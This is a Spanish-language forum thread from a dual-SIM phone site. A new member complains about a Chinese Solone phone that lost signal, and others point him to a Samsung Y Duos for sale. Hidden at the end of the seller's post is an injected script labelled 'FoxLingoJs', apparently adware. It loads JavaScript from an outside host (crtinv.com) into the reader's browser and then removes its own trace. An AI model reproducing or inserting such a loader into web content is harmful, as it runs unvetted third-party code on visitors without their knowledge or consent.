Pulsa aquí para quitar la publicidad.

Hola a toda la comunidad de Dual Sim

Tema en 'Presentaciones' iniciado por dankebix, 7 Sep 2012.

1. dankebix

dankebix Simdualero Junior

2
      0
      7 Sep 2012
      Mi experiencia con los Dual Sim es un telefono chino marca Solone con TV. Al principio funciono bastante bien, pero al cabo de 1 par de semanas perdia la señal constantemente y en ocasiones la llamada se corta :maad:. Este modelo no lo volveria a comprar, es una lastima, porque la funcion dual, en verdad que es util, sin embargo espero que en los nuevos ya hayan resuelto estos problemas. :eeek:
      Estoy por cambiar el telefono celular y como solo los chinos son duales les voy a dar otra oportunidad :redface:
      Saludos

Enlaces Patrocinados: (regístrate o inicia sesión y no te molestarán más)

• rareipe

rareipe Simdualero de Diamante

• Miembro de Honor
      • Veteran@
      21.982
      6.861
      2 Jul 2011
      Cambre
      Bienvenido al foro

También hay duales de marca, el amigo @BreakkBreakk vende un Samsung Y dúos a estrenar manda un mensaje privado si te iinteresa

saludos

Enviado desde mi Alcatel one touch 890D usando Tapatalk

Última edición por un moderador: 28 Sep 2013
    • dankebix

dankebix Simdualero Junior

2
        0
        7 Sep 2012
        Gracias, @BreakkBreakk me interesa el cel samsung, donde lo veo?, saludos

Última edición por un moderador: 28 Sep 2013
      • Breakk

Breakk Simdualero de Diamante

• Cocinero Android
        • Veteran@
        11.943
        20.220
        31 May 2010
        Hola, buenas tardes.

Puedes ver toda la info del telefono aqui: http://www.movilesdualsim.com/foro/...-Y-DUOS-(S6102)-LIBRE-NUEVO-(REBAJADO-a-120€)

Saludos.

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

Última edición por un moderador: 30 Dic 2013
      Verificación:
      Borrador guardado Borrador eliminado

Compartir esta página

Galletas! Nos obligan a informar que utilizamos cookies (como casi todas las webs). Al continuar navegando aceptas su uso.